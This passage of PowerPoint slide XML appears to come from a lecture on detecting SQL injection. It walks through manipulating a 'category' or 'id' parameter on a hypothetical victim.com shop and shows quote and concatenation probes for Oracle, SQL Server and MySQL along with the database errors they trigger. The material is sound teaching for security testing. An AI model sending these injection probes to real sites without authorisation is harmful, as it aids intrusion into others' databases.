              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>This approach implies the following steps:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>You identify all the data entry on the Web application.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>You know what kind of request might trigger anomalies.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>You detect anomalies in the response from the server.</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50838"/>
            <a:ext cx="8229600" cy="563562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Manipulating Parameters</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="1066800"/>
            <a:ext cx="8229600" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>We’ll start with a very simple example. Say you visit the Web site for Victim Inc., an e-commerce shop where you can buy all kinds of things. You can check the products online, sort them by price, show only a certain category of product… When you browse different categories of products the URL looks like this:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://www.victim.com/showproducts.php?category=bikes</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.victim.com/showproducts.php?category=cars</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>showproducts.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> page receives a parameter called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>category</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>. The application at the server side is expecting known values and displays the products which belong to the given category.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>You can assert that the application is not static; it seems that depending on the value of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>category</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> parameter the application will show different products based on the result of a query to a back-end database.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>At this point it is also important to consider what type of database operation may be occurring at the server side. In this example, we can assume that the application is performing a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> query.</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8438"/>
            <a:ext cx="8229600" cy="639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Manipulating Parameters</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="838200"/>
            <a:ext cx="8763000" cy="5943600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>You can now begin to manually change the values of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>category</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> parameter to something the application does not expect. For example:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://www.victim.com/showproducts.php?category=attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The response from the server can be as follows:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Warning: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_fetch_assoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(): supplied argument is not a valid MySQL result</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>resource in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/www/victim.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>showproducts.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> on line 34</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>This warning is a MySQL database error returned by the database when the user tries to read a record from an empty result set. This error indicates that the remote application is not properly handling unexpected data.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Continuing with the inference process you make a request, appending a single quote (‘) to the value that you previously sent:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://www.victim.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>showproducts.php?category</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>=attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The server returns the following error:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near “attacker”’ at line 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>As you can see, some applications react in unexpected ways when handling user data. Not every anomaly detected in a Web site is going to be due to a SQL injection vulnerability, as it can be affected by a number of other issues. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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GB" dirty="0"/>
              <a:t>Manipulating Parameters</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="990600"/>
            <a:ext cx="8915400" cy="5715000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Another test you can conduct to identify vulnerabilities in Oracle is to send the following two requests:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://www.victim.com/showproducts.php?category=bikes</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://www.victim.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>showproducts.php?category</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>=bi’||’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>kes</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The Microsoft SQL Server equivalent is:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://www.victim.com/showproducts.php?category=bikes</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.victim.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>showproducts.php?category</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>=bi’+’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>kes</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The MySQL equivalent is:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://www.victim.com/showproducts.php?category=bikes</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.victim.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>showproducts.php?category</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>=bi’’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>kes</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If the result of both requests is the same, there is a high possibility that there is a SQL injection vulnerability.</a:t>
            </a:r>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50838"/>
            <a:ext cx="8686800" cy="563562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0"/>
              <a:t>Information Workflow with Database Errors</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="1143000"/>
            <a:ext cx="8839200" cy="5562600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Depending on how the application is coded, the response received by the user can be one of the following:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The SQL error is displayed on the page and is visible to the user.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The SQL error is hidden in the source of the Web page for debugging purposes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Redirection to another page is used when an error is detected.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>An HTTP error code 500 (Internal Server Error) or HTTP redirection code 302 is returned.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The application handles the error properly and simply shows no results, perhaps displaying a generic error page.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>When you are trying to identify a SQL injection vulnerability you need to determine the type of response the application is returning. </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609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" dirty="0"/>
              <a:t>Microsoft SQL Server Errors</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="990600"/>
            <a:ext cx="8763000" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Consider the following request: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://www.victim.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>showproducts.aspx?category</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>=attacker’</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The error returned will be similar to the following:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server Error in ‘/’ Application.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unclosed quotation mark before the character string ‘attacker;’.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exception Details: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>System.Data.SqlClient.SqlException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Unclosed quotation mark before the character string ‘attacker;’.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The SQL statement running on the database must be as follows:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT ∗</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM products</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE category=‘attacker’’</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The application did not sanitize the single quotes, so the syntax of the statement is rejected by the database server returning an error.</a:t>
            </a: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609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Microsoft SQL Server Errors</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="1066800"/>
            <a:ext cx="8839200" cy="5715000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>This example shows a typical error returned when injecting a numeric value.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Imagine you find a page called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>showproduct.aspx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> in the Web application. The script receives a parameter called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> and displays a single product depending on the value of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> parameter:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://www.victim.com/showproduct.aspx?id=2</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>When you change the value of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> parameter to something such as:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.victim.com/showproduct.aspx?id=attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0"/>
              <a:t>the application returns an error similar to this:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0">
                <a:solidFill>
